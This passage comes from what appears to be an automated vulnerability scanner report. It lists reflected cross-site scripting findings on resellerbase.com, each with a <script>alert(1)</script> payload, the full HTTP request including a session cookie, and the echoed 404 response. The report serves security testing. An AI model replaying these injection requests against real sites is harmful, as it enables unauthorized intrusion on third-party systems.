Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/32/themes/kosmos/imagesb22cc<script>alert(1)</script>f7b6f13b216/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2282. http://www.resellerbase.com/detail/32/themes/kosmos/images/rating/0.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/32/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 72d98<script>alert(1)</script>3f3c139315b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/32/themes/kosmos/images/rating72d98<script>alert(1)</script>3f3c139315b/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/32/themes/kosmos/images/rating72d98<script>alert(1)</script>3f3c139315b/0.gif was not found on this server.</p>
...[SNIP]...

2.2283. http://www.resellerbase.com/detail/32/themes/kosmos/images/rating/0.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/32/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload f7e02<script>alert(1)</script>c77d4da2da1 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/32/themes/kosmos/images/rating/0.giff7e02<script>alert(1)</script>c77d4da2da1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/32/themes/kosmos/images/rating/0.giff7e02<script>alert(1)</script>c77d4da2da1 was not found on this server.</p>
...[SNIP]...

2.2284. http://www.resellerbase.com/detail/32/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/32/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e19ae<script>alert(1)</script>066f539b3b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/32/themes/kosmos/images/rating/0.gif?e19ae<script>alert(1)</script>066f539b3b3=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/32/themes/kosmos/images/rating/0.gif?e19ae<script>alert(1)</script>066f539b3b3=1 was not found on this server.</p>
...[SNIP]...

2.2285. http://www.resellerbase.com/detail/33/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/33/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bd706<script>alert(1)</script>8b8cf2bf6cc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailbd706<script>alert(1)</script>8b8cf2bf6cc/33/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailbd706<script>alert(1)</script>8b8cf2bf6cc/33/ was not found on this server.</p>
...[SNIP]...

2.2286. http://www.resellerbase.com/detail/33/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/33/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6fd18<script>alert(1)</script>547a09095c2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/336fd18<script>alert(1)</script>547a09095c2/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/336fd18<script>alert(1)</script>547a09095c2/ was not found on this server.</p>
...[SNIP]...

2.2287. http://www.resellerbase.com/detail/33/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/33/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b1452<script>alert(1)</script>6f607a8a9f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/33/?b1452<script>alert(1)</script>6f607a8a9f1=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.2288. http://www.resellerbase.com/detail/33/love-money-de-german.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/33/love-money-de-german.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 870be<script>alert(1)</script>32c4819d7ce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail870be<script>alert(1)</script>32c4819d7ce/33/love-money-de-german.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail870be<script>alert(1)</script>32c4819d7ce/33/love-money-de-german.html was not found on this server.</p>
...[SNIP]...

2.2289. http://www.resellerbase.com/detail/33/love-money-de-german.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/33/love-money-de-german.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6ff44<a>e80e1aace67 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/336ff44<a>e80e1aace67/love-money-de-german.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/336ff44<a>e80e1aace67/love-money-de-german.html was not found on this server.</p>
...[SNIP]...

2.2290. http://www.resellerbase.com/detail/33/love-money-de-german.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/33/love-money-de-german.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e5341<script>alert(1)</script>dd7378e2a19 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/33/e5341<script>alert(1)</script>dd7378e2a19 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/33/e5341<script>alert(1)</script>dd7378e2a19 was not found on this server.</p>
...[SNIP]...

2.2291. http://www.resellerbase.com/detail/33/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/33/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fa967<script>alert(1)</script>ffdcf9c9c59b92fe3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detailfa967<script>alert(1)</script>ffdcf9c9c59b92fe3/33/rating.php?id=33&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/33/love-money-de-german.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailfa967<script>alert(1)</script>ffdcf9c9c59b92fe3/33/rating.php?id=33&rating=5 was not found on this server.</p>
...[SNIP]...

2.2292. http://www.resellerbase.com/detail/33/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/33/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2469c<script>alert(1)</script>c39c7baa548 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail2469c<script>alert(1)</script>c39c7baa548/33/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail2469c<script>alert(1)</script>c39c7baa548/33/rating.php was not found on this server.</p>
...[SNIP]...

2.2293. http://www.resellerbase.com/detail/33/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/33/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3f5c4<script>alert(1)</script>918a21030ec7a894a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/333f5c4<script>alert(1)</script>918a21030ec7a894a/rating.php?id=33&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/33/love-money-de-german.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/333f5c4<script>alert(1)</script>918a21030ec7a894a/rating.php?id=33&rating=5 was not found on this server.</p>
...[SNIP]...

2.2294. http://www.resellerbase.com/detail/33/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/33/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 613b4<script>alert(1)</script>615fbe427a2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/33613b4<script>alert(1)</script>615fbe427a2/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/33613b4<script>alert(1)</script>615fbe427a2/rating.php was not found on this server.</p>
...[SNIP]...

2.2295. http://www.resellerbase.com/detail/33/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/33/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e1225<script>alert(1)</script>959f1f43f994c7179 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/33/rating.phpe1225<script>alert(1)</script>959f1f43f994c7179?id=33&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/33/love-money-de-german.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/33/rating.phpe1225<script>alert(1)</script>959f1f43f994c7179?id=33&rating=5 was not found on this server.</p>
...[SNIP]...

2.2296. http://www.resellerbase.com/detail/33/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/33/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload edf41<script>alert(1)</script>caecc2c4b03 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/33/rating.phpedf41<script>alert(1)</script>caecc2c4b03 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/33/rating.phpedf41<script>alert(1)</script>caecc2c4b03 was not found on this server.</p>
...[SNIP]...

2.2297. http://www.resellerbase.com/detail/33/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/33/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a453e<script>alert(1)</script>2166841a0f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/33/rating.php?a453e<script>alert(1)</script>2166841a0f4=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/33/rating.php?a453e<script>alert(1)</script>2166841a0f4=1 was not found on this server.</p>
...[SNIP]...

2.2298. http://www.resellerbase.com/detail/33/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/33/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 85442<script>alert(1)</script>15ac8ffc51bea3403 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/33/rating.php/85442<script>alert(1)</script>15ac8ffc51bea3403?id=33&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/33/love-money-de-german.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/33/rating.php/85442<script>alert(1)</script>15ac8ffc51bea3403?id=33&rating=5 was not found on this server.</p>
...[SNIP]...

2.2299. http://www.resellerbase.com/detail/33/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/33/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5e37a<script>alert(1)</script>c4cc015f2fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail5e37a<script>alert(1)</script>c4cc015f2fc/33/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/33/love-money-de-german.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail5e37a<script>alert(1)</script>c4cc015f2fc/33/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2300. http://www.resellerbase.com/detail/33/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/33/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9e678<script>alert(1)</script>7aaf067b74e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/339e678<script>alert(1)</script>7aaf067b74e/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/33/love-money-de-german.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
